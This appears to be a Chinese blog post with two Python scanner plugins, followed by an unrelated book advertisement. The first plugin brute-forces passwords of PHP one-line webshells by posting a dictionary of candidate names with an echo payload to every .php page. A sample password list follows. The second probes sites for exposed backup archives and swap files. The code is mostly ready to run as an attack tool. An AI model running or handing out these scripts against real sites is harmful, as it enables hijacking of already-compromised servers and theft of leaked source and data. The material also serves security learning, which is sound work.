参考文章: 秒爆十万字典:奇葩技巧快速枚举“一句话后门”密码
上面的文章需要反复看,看懂了再看下面的代码。在 script
目录中新建 webshell_check.py
# __author__ = 'mathor' # Blast the end of every.php file with one sentence import sys, os from lib.core.Download import Downloader filename = os.path.join(sys.path[0], 'data', 'web_shell.dic') payload = [] f = open(filename) a = 0 for i in f: payload.append(i.strip()) a += 1 if (a == 999): break class spider: def run(self, url, html): if (not url.endswith('.php')): return False print("[WebShell check:]", url) post_data = {} for _payload in payload: post_data[_payload] = 'echo "password is %s";' % _payload r = Downloader.post(url, post_data) if r: print("webshell:%s" % r) return True return False
1 2 3 4 5 6 7 8 9 10 404 data tools index0 sh3ll shell shel she shell1 shell99 root rootshell bypass anonym0us anonymous shellnymous fuck system a b c abc d e f g h i j k l m n o p y z webshell hack h4ck
已经有前辈为我们造好了轮子: https://github.com/secfree/bcrpscan
我们只需要修改其中生成路径的部分,使输入一个网站路径就可以得出备份文件地址。在 script
目录下新建 bak_check.py
# __author__ = 'mathor' import sys, os from lib.core.Download import Downloader from urllib.parse import urlparse DIR_PROBE_EXTS = ['.tar.gz', '.zip', '.rar', '.tar.gz2'] FILE_PROBE_EXTS = ['.bak', '.swp', '.1'] download = Downloader() def get_parent_paths(path): paths = [] if not path or path[0] != '/': return paths paths.append(path) tph = path if path[-1] == '/': tph = path[:-1] while tph: tph = tph[:tph.rfind('/') + 1] paths.append(tph) tph = tph[:-1] return paths class spider: def run(self, url, html): pr = urlparse(url) paths = get_parent_paths(pr.path) web_paths = [] for p in paths: if p == '/': for ext in DIR_PROBE_EXTS: u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, pr.netloc + ext) else: if p[-1] == '/': for ext in DIR_PROBE_EXTS: u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p[:-1], ext) else: for ext in FILE_PROBE_EXTS: u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, ext) web_paths.append(u) for path in web_paths: print("[web path]:%s" % path) if (download.get(path) is not None): print("[+] bak file has found: %s" % path) return False
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- DNS区域传输 && DNS爆破
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Michael Mahemoff / 杨仁和 / 电子工业出版社 / 2007-5 / 78.00元
★本书荣获LinuxWorld Linux Journal2006年Editors' Choice awards。 ★绝好的一本ajax 高级读物,建议 每个web 程序员都需要买一本,了解什么是真正的好的web设计--网友 [精彩试读一] [精彩试读二] 本书是一本关于复杂Ajax应用的整体架构设计......一起来看看 《Ajax设计模式》 这本书的介绍吧!